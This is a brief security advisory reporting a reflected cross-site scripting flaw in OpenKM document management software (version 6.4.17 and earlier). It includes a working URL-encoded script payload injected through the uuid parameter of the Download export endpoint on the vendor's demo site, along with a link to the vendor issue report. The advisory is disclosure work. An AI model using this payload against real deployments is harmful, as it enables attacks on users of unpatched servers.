Openkm Document Management System Suffers From Cross Site Scripting Attack

http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/openkm.jpg

Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Auther :  <https://www.facebook.com/khalil.shr> Khalil
<https://www.facebook.com/khalil.shr> Shreateh

Auther Website: http://khalil-shreateh.com
Status : Reported .
Report Link : http://issues.openkm.com/view.php?id=3056

Attack Description

log in with any user
Navigate to :
<http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Eale
rt%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
>
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealer
t%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E

  

POC IMAGE :

http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/xss.jpg